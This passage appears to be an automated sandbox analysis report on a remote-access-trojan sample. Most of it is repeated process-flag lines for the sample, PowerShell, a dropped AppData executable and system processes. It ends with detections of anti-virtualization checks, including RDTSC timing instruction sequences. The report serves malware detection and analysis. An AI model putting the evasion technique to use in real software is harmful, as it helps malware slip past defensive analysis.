Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KfYvtUBOq.exe PID: 3360, type: MEMORYSTR

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2B59904 second address: 2B5990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2B59B7E second address: 2B59B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2999904 second address: 299990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2999B7E second address: 2999B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

